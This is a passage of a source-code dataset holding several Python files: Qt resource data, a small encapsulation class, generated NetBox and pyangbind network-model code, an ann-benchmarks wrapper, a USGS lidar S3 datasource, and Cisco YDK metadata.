\x01\\x8d%\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xf7\\\n\\x00\\x00\\x0f\\x84\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\xacl\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xee\\\n\\x00\\x00\\x0e\\x16\\x00\\x00\
\x00\\x00\\x00\\x01\\x00\\x01\\xa2\\x0f\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xe4\\\n\\x00\\x00\\x06\\x90\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01u:\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xea\\\n\\x00\\x00\\x10\\xca\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\xb5\\xcb\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xf6\\\n\\x00\\x00\\x0d\\xbe\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\xa0\\xcf\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xdf\\\n\\x00\\x00\\x11\\x1a\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\xba\\x05\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xd9\\\n\\x00\\x00\\x07Z\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01y\\xd7\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xde\\\n\\x00\\x00\\x0bD\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x91\\xf7\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xd4\\\n\\x00\\x00\\x0eP\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\xa3\\xb3\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xdd\\\n\\x00\\x00\\x0c\\x90\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x98{\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xe0\\\n\\x00\\x00\\x0d\\x14\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x9b!\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xe6\\\n\\x00\\x00\\x0e\\xfe\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\xa7\\xdf\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xe1\\\n\\x00\\x00\\x0a\\xd0\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x8f\\x7f\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xd6\\\n\\x00\\x00\\x07\\xe0\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01|_\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xde\\\n\\x00\\x00\\x03\\xbe\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01b\\x1f\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xd6\\\n\\x00\\x00\\x06L\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01t\\x1b\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xf4\\\n\\x00\\x00\\x0f \\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\xa9\\x91\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xea\\\n\\x00\\x00\\x06\\x1e\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01r\\xaf\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xf0\\\n\\x00\\x00\\x07\\xa0\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01{\\x17\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xec\\\n\\x00\\x00\\x03\\xf0\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01c/\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xd5\\\n\\x00\\x00\\x04\\x86\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01ha\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xe2\\\n\\x00\\x00\\x10P\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\xb0\\x8a\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xe4\\\n\\x00\\x00\\x0cN\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x97\\x16\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xda\\\n\\x00\\x00\\x09\\x16\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x85\\x0d\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xe3\\\n\\x00\\x00\\x0f\\xc8\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\xae 
\\\n\\x00\\x00\\x01|K\\xb5\\xff\\xf5\\\n\\x00\\x00\\x02\\xcc\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01P7\\\n\\x00\\x00\\x01|\\x92\\x17g\\xb1\\\n\\x00\\x00\\x02|\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x1a9\\\n\\x00\\x00\\x01|\\x92\\x17g\\xb4\\\n\\x00\\x00\\x02`\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x15\\xd8\\\n\\x00\\x00\\x01|\\x92\\x17g\\xb2\\\n\\x00\\x00\\x03\\x0a\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01R$\\\n\\x00\\x00\\x01|z\\x1a\\x99\\xb6\\\n\\x00\\x00\\x01\\x90\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x0c\\x99\\\n\\x00\\x00\\x01|\\x92\\x17g\\xb3\\\n\\x00\\x00\\x02\\x1a\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x14\\xb3\\\n\\x00\\x00\\x01|x\\xc9R\\x9c\\\n\\x00\\x00\\x01\\xcc\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x0eT\\\n\\x00\\x00\\x01|\\x92\\x17g\\xb5\\\n\\x00\\x00\\x03N\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01_+\\\n\\x00\\x00\\x01|x\\xc8\\xac\\x18\\\n\\x00\\x00\\x02\\xae\\x00\\x01\\x00\\x00\\x00\\x01\\x00\\x01\\x1cA\\\n\\x00\\x00\\x01|\\x92\\x17g\\xae\\\n\\x00\\x00\\x01\\xea\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x12\\xf9\\\n\\x00\\x00\\x01|\\x92\\x17g\\xb6\\\n\\x00\\x00\\x01\\x16\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00>\\x17\\\n\\x00\\x00\\x01|\\x92\\x17g\\xb7\\\n\\x00\\x00\\x018\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\xd0\\xdd\\\n\\x00\\x00\\x01|\\x92\\x17g\\xb7\\\n\"\n\ndef qInitResources():\n QtCore.qRegisterResourceData(0x03, qt_resource_struct, qt_resource_name, qt_resource_data)\n\ndef qCleanupResources():\n QtCore.qUnregisterResourceData(0x03, qt_resource_struct, qt_resource_name, qt_resource_data)\n\nqInitResources()\n"} {"ext": "py", "sha": "1a2f3cea35bbeab0fac5b0a6fd23d61f79be9b2c", "content": "class Encapsulada:\n\n atributo_visible = 'soy visible'\n _atributo_protegido = 'soy protegido'\n __atributo_privado = 'soy un atributo privado'\n\n def get_atributo_privado(self):\n return self.__atributo_privado\n\n def set_atributo_privado(self, cambio):\n self.__atributo_privado = cambio\n"} {"ext": "py", "sha": "1a2f3edc14828893e52f591f241c6f4d3c54fce3", "content": "# coding: utf-8\n\n\"\"\"\n NetBox API\n\n API to access NetBox # noqa: E501\n\n OpenAPI spec version: 2.8\n \n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nfrom __future__ import absolute_import\n\nimport unittest\n\nimport netbox_client\nfrom netbox_client.models.writable_front_port import WritableFrontPort # noqa: E501\nfrom netbox_client.rest import ApiException\n\n\nclass TestWritableFrontPort(unittest.TestCase):\n \"\"\"WritableFrontPort unit test stubs\"\"\"\n\n def setUp(self):\n pass\n\n def tearDown(self):\n pass\n\n def testWritableFrontPort(self):\n \"\"\"Test WritableFrontPort\"\"\"\n # FIXME: construct object with mandatory attributes with example values\n # model = netbox_client.models.writable_front_port.WritableFrontPort() # noqa: E501\n pass\n\n\nif __name__ == '__main__':\n unittest.main()\n"} {"ext": "py", "sha": "1a2f3fdd43f2a1b0b52665cf073448048e5e40fb", "content": "\nfrom operator import attrgetter\nimport pyangbind.lib.xpathhelper as xpathhelper\nfrom pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType\nfrom pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType\nfrom pyangbind.lib.base import PybindBase\nfrom decimal import Decimal\nfrom bitarray import bitarray\nimport __builtin__\nclass lsp_admin_group_include_all(PybindBase):\n \"\"\"\n This class was auto-generated by the PythonClass plugin for PYANG\n from YANG module brocade-mpls - based on the path 
/brocade_mpls_rpc/show-mpls-lsp-debug/output/lsp/show-mpls-lsp-debug-info/show-mpls-lsp-common-info/lsp-config-frr-admin-groups/lsp-admin-group/lsp-admin-group-include-all. Each member element of\n the container is represented as a class variable - with a specific\n YANG type.\n \"\"\"\n __slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_rest_name', '_extmethods', '__lsp_admin_group_include_all_group_id',)\n\n _yang_name = 'lsp-admin-group-include-all'\n _rest_name = 'lsp-admin-group-include-all'\n\n _pybind_generated_by = 'container'\n\n def __init__(self, *args, **kwargs):\n\n path_helper_ = kwargs.pop(\"path_helper\", None)\n if path_helper_ is False:\n self._path_helper = False\n elif path_helper_ is not None and isinstance(path_helper_, xpathhelper.YANGPathHelper):\n self._path_helper = path_helper_\n elif hasattr(self, \"_parent\"):\n path_helper_ = getattr(self._parent, \"_path_helper\", False)\n self._path_helper = path_helper_\n else:\n self._path_helper = False\n\n extmethods = kwargs.pop(\"extmethods\", None)\n if extmethods is False:\n self._extmethods = False\n elif extmethods is not None and isinstance(extmethods, dict):\n self._extmethods = extmethods\n elif hasattr(self, \"_parent\"):\n extmethods = getattr(self._parent, \"_extmethods\", None)\n self._extmethods = extmethods\n else:\n self._extmethods = False\n self.__lsp_admin_group_include_all_group_id = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name=\"lsp-admin-group-include-all-group-id\", rest_name=\"lsp-admin-group-include-all-group-id\", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)\n\n load = kwargs.pop(\"load\", None)\n if args:\n if len(args) > 1:\n raise TypeError(\"cannot create a YANG container with >1 argument\")\n all_attr = True\n for e in self._pyangbind_elements:\n if not hasattr(args[0], e):\n all_attr = False\n break\n if not all_attr:\n raise ValueError(\"Supplied object did not have the correct attributes\")\n for e in self._pyangbind_elements:\n nobj = getattr(args[0], e)\n if nobj._changed() is False:\n continue\n setmethod = getattr(self, \"_set_%s\" % e)\n if load is None:\n setmethod(getattr(args[0], e))\n else:\n setmethod(getattr(args[0], e), load=load)\n\n def _path(self):\n if hasattr(self, \"_parent\"):\n return self._parent._path()+[self._yang_name]\n else:\n return [u'brocade_mpls_rpc', u'show-mpls-lsp-debug', u'output', u'lsp', u'show-mpls-lsp-debug-info', u'show-mpls-lsp-common-info', u'lsp-config-frr-admin-groups', u'lsp-admin-group', u'lsp-admin-group-include-all']\n\n def _rest_path(self):\n if hasattr(self, \"_parent\"):\n if self._rest_name:\n return self._parent._rest_path()+[self._rest_name]\n else:\n return self._parent._rest_path()\n else:\n return [u'show-mpls-lsp-debug', u'output', u'lsp', u'lsp-config-frr-admin-groups', u'lsp-admin-group-include-all']\n\n def _get_lsp_admin_group_include_all_group_id(self):\n \"\"\"\n Getter method for lsp_admin_group_include_all_group_id, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_debug/output/lsp/show_mpls_lsp_debug_info/show_mpls_lsp_common_info/lsp_config_frr_admin_groups/lsp_admin_group/lsp_admin_group_include_all/lsp_admin_group_include_all_group_id (uint32)\n\n YANG Description: Include all admin group id\n \"\"\"\n return 
self.__lsp_admin_group_include_all_group_id\n \n def _set_lsp_admin_group_include_all_group_id(self, v, load=False):\n \"\"\"\n Setter method for lsp_admin_group_include_all_group_id, mapped from YANG variable /brocade_mpls_rpc/show_mpls_lsp_debug/output/lsp/show_mpls_lsp_debug_info/show_mpls_lsp_common_info/lsp_config_frr_admin_groups/lsp_admin_group/lsp_admin_group_include_all/lsp_admin_group_include_all_group_id (uint32)\n If this variable is read-only (config: false) in the\n source YANG file, then _set_lsp_admin_group_include_all_group_id is considered as a private\n method. Backends looking to populate this variable should\n do so via calling thisObj._set_lsp_admin_group_include_all_group_id() directly.\n\n YANG Description: Include all admin group id\n \"\"\"\n parent = getattr(self, \"_parent\", None)\n if parent is not None and load is False:\n raise AttributeError(\"Cannot set keys directly when\" +\n \" within an instantiated list\")\n\n if hasattr(v, \"_utype\"):\n v = v._utype(v)\n try:\n t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name=\"lsp-admin-group-include-all-group-id\", rest_name=\"lsp-admin-group-include-all-group-id\", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)\n except (TypeError, ValueError):\n raise ValueError({\n 'error-string': \"\"\"lsp_admin_group_include_all_group_id must be of a type compatible with uint32\"\"\",\n 'defined-type': \"uint32\",\n 'generated-type': \"\"\"YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name=\"lsp-admin-group-include-all-group-id\", rest_name=\"lsp-admin-group-include-all-group-id\", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)\"\"\",\n })\n\n self.__lsp_admin_group_include_all_group_id = t\n if hasattr(self, '_set'):\n self._set()\n\n def _unset_lsp_admin_group_include_all_group_id(self):\n self.__lsp_admin_group_include_all_group_id = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name=\"lsp-admin-group-include-all-group-id\", rest_name=\"lsp-admin-group-include-all-group-id\", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)\n\n lsp_admin_group_include_all_group_id = __builtin__.property(_get_lsp_admin_group_include_all_group_id, _set_lsp_admin_group_include_all_group_id)\n\n\n _pyangbind_elements = {'lsp_admin_group_include_all_group_id': lsp_admin_group_include_all_group_id, }\n\n\n"} {"ext": "py", "sha": "1a2f40bea97426641a515b43d3e4286b9d5483b1", "content": "from __future__ import absolute_import\nimport pynndescent\nfrom ann_benchmarks.algorithms.base import BaseANN\n\nclass PyNNDescent(BaseANN):\n def __init__(self, metric, n_neighbors=10, n_trees=8, leaf_size=20):\n self._n_neighbors = int(n_neighbors)\n self._n_trees = int(n_trees)\n self._leaf_size = int(leaf_size)\n self._queue_size=None\n self._pynnd_metric = {'angular': 
'cosine',\n 'euclidean': 'euclidean',\n 'hamming': 'hamming',\n 'jaccard': 'jaccard'}[metric]\n\n def fit(self, X):\n self._index = pynndescent.NNDescent(X,\n n_neighbors=self._n_neighbors,\n n_trees=self._n_trees,\n leaf_size=self._leaf_size,\n metric=self._pynnd_metric)\n\n def set_query_arguments(self, queue_size):\n self._queue_size = float(queue_size)\n\n\n def query(self, v, n):\n ind, dist = self._index.query(v.reshape(1, -1).astype('float32'), k=n, queue_size=self._queue_size)\n return ind[0]\n\n def use_threads(self):\n return False\n\n def __str__(self):\n return 'PyNNDescent(n_neighbors=%d, n_trees=%d, leaf_size=%d, queue_size=%.2f)' % (self._n_neighbors,\n self._n_trees,\n self._leaf_size,\n self._queue_size)"} {"ext": "py", "sha": "1a2f410f822d032450aa752eb50cb91c79df1f19", "content": "import os\nimport json\nimport uuid\n\nimport boto3\n\n\nfrom datasources.stac.query import STACQuery\nfrom datasources.sources.base import Datasource\n\nclient = boto3.client('s3')\nbucket = 'usgs-lidar-public'\n\nclass USGS3DEP(Datasource):\n\n stac_compliant = False\n tags = ['Elevation', 'Raster']\n\n def __init__(self, manifest):\n super().__init__(manifest)\n\n def search(self, spatial, temporal=None, properties=None, limit=10, **kwargs):\n from db import Database\n\n names = []\n stac_query = STACQuery(spatial, temporal, properties)\n # projects = stac_query.check_spatial(self.__class__.__name__)[:limit]\n\n with Database.load(read_only=True, deployed=True) as db:\n projects = db.spatial_query({\"type\": \"Feature\", \"geometry\": stac_query.spatial})\n\n searches = 0\n for item in projects:\n if item['name'] not in names:\n if temporal and item['year']:\n if stac_query.temporal[0].year != item['year'] or stac_query.temporal[1].year != item['year']:\n continue\n\n if properties:\n item.update({'properties': stac_query})\n\n if searches < limit:\n self.manifest.searches.append([self, item])\n searches+=1\n\n\n\n # searches = 0\n # for item in projects:\n # if item['name'] not in names:\n # # Temporal check by checking year of start/end date\n # if temporal and item['year']:\n # if stac_query.temporal[0].year == item['year'] or stac_query.temporal[1].year == item['year']:\n # if properties:\n # item.update({'properties': stac_query})\n # self.manifest.searches.append([self, item])\n # names.append(item['name'])\n # else:\n # self.manifest.searches.append([self, item])\n # names.append(item['name'])\n\n def execute(self, query):\n # Download metadata from query item\n response = client.get_object(Bucket=bucket, Key=os.path.join(query['name'], 'ept.json'))\n metadata = json.loads(response['Body'].read().decode('utf-8'))\n\n xvals = [x[0] for x in query['geometry']['coordinates'][0]]\n yvals = [y[1] for y in query['geometry']['coordinates'][0]]\n\n\n stac_item = {\n 'id': str(uuid.uuid4()),\n 'type': 'Feature',\n 'bbox': [min(xvals), min(yvals), max(xvals), max(yvals)],\n 'geometry': query['geometry'],\n 'properties': {\n 'datetime': f\"{query['year']}-01-01T00:00:00.00Z\",\n 'eo:epsg': metadata['srs']['horizontal'],\n 'pc:count': metadata['points'],\n 'pc:type': 'lidar',\n 'pc:encoding': metadata['dataType'],\n 'pc:schema': metadata['schema'],\n 'legacy:span': metadata['span'],\n 'legacy:version': metadata['version'],\n },\n 'assets': {\n 's3path': {\n 'href': f\"s3://{bucket}/{query['name']}\",\n 'title': 'EPT data'\n }\n },\n }\n\n if \"properties\" in list(query):\n if query['properties'].check_properties(stac_item['properties']):\n return [stac_item]\n else:\n return [stac_item]"} {"ext": 
"py", "sha": "1a2f42594b5ecd2ed04908d58cdc7e79376638b5", "content": "\n\n\nimport re\nimport collections\n\nfrom enum import Enum\n\nfrom ydk._core._dm_meta_info import _MetaInfoClassMember, _MetaInfoClass, _MetaInfoEnum\nfrom ydk.types import Empty, YList, YLeafList, DELETE, Decimal64, FixedBitsDict\nfrom ydk._core._dm_meta_info import ATTRIBUTE, REFERENCE_CLASS, REFERENCE_LIST, REFERENCE_LEAFLIST, REFERENCE_IDENTITY_CLASS, REFERENCE_ENUM_CLASS, REFERENCE_BITS, REFERENCE_UNION\n\nfrom ydk.errors import YPYError, YPYModelError\nfrom ydk.providers._importer import _yang_ns\n\n_meta_table = {\n 'HistRecordEnum' : _MetaInfoEnum('HistRecordEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_config_cfgmgr_exec_oper',\n {\n 'cfghist-bag-record-all':'cfghist_bag_record_all',\n 'cfghist-bag-record-alarm':'cfghist_bag_record_alarm',\n 'cfghist-bag-record-cfs-check':'cfghist_bag_record_cfs_check',\n 'cfghist-bag-record-commit':'cfghist_bag_record_commit',\n 'cfghist-bag-record-oir':'cfghist_bag_record_oir',\n 'cfghist-bag-record-shutdown':'cfghist_bag_record_shutdown',\n 'cfghist-bag-record-startup':'cfghist_bag_record_startup',\n 'cfghist-bag-record-backup':'cfghist_bag_record_backup',\n 'cfghist-bag-record-rebase':'cfghist_bag_record_rebase',\n 'cfghist-bag-record-last':'cfghist_bag_record_last',\n }, 'Cisco-IOS-XR-config-cfgmgr-exec-oper', _yang_ns._namespaces['Cisco-IOS-XR-config-cfgmgr-exec-oper']),\n 'CfgHistGl.RecordType.Record.Info.AlarmInfo' : {\n 'meta_info' : _MetaInfoClass('CfgHistGl.RecordType.Record.Info.AlarmInfo',\n False, \n [\n _MetaInfoClassMember('state', ATTRIBUTE, 'str' , None, None, \n [], [], \n ''' State\n ''',\n 'state',\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper', False),\n _MetaInfoClassMember('where', ATTRIBUTE, 'str' , None, None, \n [], [], \n ''' Where\n ''',\n 'where',\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper', False),\n ],\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper',\n 'alarm-info',\n _yang_ns._namespaces['Cisco-IOS-XR-config-cfgmgr-exec-oper'],\n 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_config_cfgmgr_exec_oper'\n ),\n },\n 'CfgHistGl.RecordType.Record.Info.CfscheckInfo' : {\n 'meta_info' : _MetaInfoClass('CfgHistGl.RecordType.Record.Info.CfscheckInfo',\n False, \n [\n _MetaInfoClassMember('line', ATTRIBUTE, 'str' , None, None, \n [], [], \n ''' Line\n ''',\n 'line',\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper', False),\n _MetaInfoClassMember('user-id', ATTRIBUTE, 'str' , None, None, \n [], [], \n ''' UserId\n ''',\n 'user_id',\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper', False),\n ],\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper',\n 'cfscheck-info',\n _yang_ns._namespaces['Cisco-IOS-XR-config-cfgmgr-exec-oper'],\n 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_config_cfgmgr_exec_oper'\n ),\n },\n 'CfgHistGl.RecordType.Record.Info.CommitInfo' : {\n 'meta_info' : _MetaInfoClass('CfgHistGl.RecordType.Record.Info.CommitInfo',\n False, \n [\n _MetaInfoClassMember('client-name', ATTRIBUTE, 'str' , None, None, \n [], [], \n ''' Client name\n ''',\n 'client_name',\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper', False),\n _MetaInfoClassMember('comment', ATTRIBUTE, 'str' , None, None, \n [], [], \n ''' Comment\n ''',\n 'comment',\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper', False),\n _MetaInfoClassMember('commit-id', ATTRIBUTE, 'str' , None, None, \n [], [], \n ''' CommitId\n ''',\n 'commit_id',\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper', False),\n _MetaInfoClassMember('label', ATTRIBUTE, 'str' , None, None, \n [], [], \n ''' Label\n ''',\n 'label',\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper', False),\n 
_MetaInfoClassMember('line', ATTRIBUTE, 'str' , None, None, \n [], [], \n ''' Line\n ''',\n 'line',\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper', False),\n _MetaInfoClassMember('user-id', ATTRIBUTE, 'str' , None, None, \n [], [], \n ''' UserId\n ''',\n 'user_id',\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper', False),\n ],\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper',\n 'commit-info',\n _yang_ns._namespaces['Cisco-IOS-XR-config-cfgmgr-exec-oper'],\n 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_config_cfgmgr_exec_oper'\n ),\n },\n 'CfgHistGl.RecordType.Record.Info.OirInfo' : {\n 'meta_info' : _MetaInfoClass('CfgHistGl.RecordType.Record.Info.OirInfo',\n False, \n [\n _MetaInfoClassMember('config-name', ATTRIBUTE, 'str' , None, None, \n [], [], \n ''' Config Name\n ''',\n 'config_name',\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper', False),\n _MetaInfoClassMember('config-type', ATTRIBUTE, 'str' , None, None, \n [], [], \n ''' Config Type\n ''',\n 'config_type',\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper', False),\n _MetaInfoClassMember('operation', ATTRIBUTE, 'str' , None, None, \n [], [], \n ''' Operation\n ''',\n 'operation',\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper', False),\n ],\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper',\n 'oir-info',\n _yang_ns._namespaces['Cisco-IOS-XR-config-cfgmgr-exec-oper'],\n 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_config_cfgmgr_exec_oper'\n ),\n },\n 'CfgHistGl.RecordType.Record.Info.ShutdownInfo' : {\n 'meta_info' : _MetaInfoClass('CfgHistGl.RecordType.Record.Info.ShutdownInfo',\n False, \n [\n _MetaInfoClassMember('comment', ATTRIBUTE, 'str' , None, None, \n [], [], \n ''' Comment\n ''',\n 'comment',\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper', False),\n ],\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper',\n 'shutdown-info',\n _yang_ns._namespaces['Cisco-IOS-XR-config-cfgmgr-exec-oper'],\n 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_config_cfgmgr_exec_oper'\n ),\n },\n 'CfgHistGl.RecordType.Record.Info.StartupInfo' : {\n 'meta_info' : _MetaInfoClass('CfgHistGl.RecordType.Record.Info.StartupInfo',\n False, \n [\n _MetaInfoClassMember('boot-path', ATTRIBUTE, 'str' , None, None, \n [], [], \n ''' Boot Path\n ''',\n 'boot_path',\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper', False),\n _MetaInfoClassMember('how-booted', ATTRIBUTE, 'str' , None, None, \n [], [], \n ''' How Booted\n ''',\n 'how_booted',\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper', False),\n ],\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper',\n 'startup-info',\n _yang_ns._namespaces['Cisco-IOS-XR-config-cfgmgr-exec-oper'],\n 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_config_cfgmgr_exec_oper'\n ),\n },\n 'CfgHistGl.RecordType.Record.Info.BackupInfo' : {\n 'meta_info' : _MetaInfoClass('CfgHistGl.RecordType.Record.Info.BackupInfo',\n False, \n [\n _MetaInfoClassMember('comment', ATTRIBUTE, 'str' , None, None, \n [], [], \n ''' Comment\n ''',\n 'comment',\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper', False),\n ],\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper',\n 'backup-info',\n _yang_ns._namespaces['Cisco-IOS-XR-config-cfgmgr-exec-oper'],\n 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_config_cfgmgr_exec_oper'\n ),\n },\n 'CfgHistGl.RecordType.Record.Info' : {\n 'meta_info' : _MetaInfoClass('CfgHistGl.RecordType.Record.Info',\n False, \n [\n _MetaInfoClassMember('a', ATTRIBUTE, 'int' , None, None, \n [('0', '4294967295')], [], \n ''' B\n ''',\n 'a',\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper', False),\n _MetaInfoClassMember('alarm-info', REFERENCE_CLASS, 'AlarmInfo' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_config_cfgmgr_exec_oper', 'CfgHistGl.RecordType.Record.Info.AlarmInfo', \n [], [], \n ''' 
alarm info\n ''',\n 'alarm_info',\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper', False),\n _MetaInfoClassMember('backup-info', REFERENCE_CLASS, 'BackupInfo' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_config_cfgmgr_exec_oper', 'CfgHistGl.RecordType.Record.Info.BackupInfo', \n [], [], \n ''' backup info\n ''',\n 'backup_info',\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper', False),\n _MetaInfoClassMember('cfscheck-info', REFERENCE_CLASS, 'CfscheckInfo' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_config_cfgmgr_exec_oper', 'CfgHistGl.RecordType.Record.Info.CfscheckInfo', \n [], [], \n ''' cfscheck info\n ''',\n 'cfscheck_info',\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper', False),\n _MetaInfoClassMember('commit-info', REFERENCE_CLASS, 'CommitInfo' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_config_cfgmgr_exec_oper', 'CfgHistGl.RecordType.Record.Info.CommitInfo', \n [], [], \n ''' commit info\n ''',\n 'commit_info',\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper', False),\n _MetaInfoClassMember('oir-info', REFERENCE_CLASS, 'OirInfo' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_config_cfgmgr_exec_oper', 'CfgHistGl.RecordType.Record.Info.OirInfo', \n [], [], \n ''' oir info\n ''',\n 'oir_info',\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper', False),\n _MetaInfoClassMember('shutdown-info', REFERENCE_CLASS, 'ShutdownInfo' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_config_cfgmgr_exec_oper', 'CfgHistGl.RecordType.Record.Info.ShutdownInfo', \n [], [], \n ''' shutdown info\n ''',\n 'shutdown_info',\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper', False),\n _MetaInfoClassMember('startup-info', REFERENCE_CLASS, 'StartupInfo' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_config_cfgmgr_exec_oper', 'CfgHistGl.RecordType.Record.Info.StartupInfo', \n [], [], \n ''' startup info\n ''',\n 'startup_info',\n 'Cisco-IOS-XR-config-cfgmgr-exec-oper', False),\n _MetaInfoClassMember('type', REFERENCE_ENUM_CLASS, 'HistRecordEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_config_cfgmgr_exec_oper', 'HistRecordEnum', \n [], [], \n ''' type\n 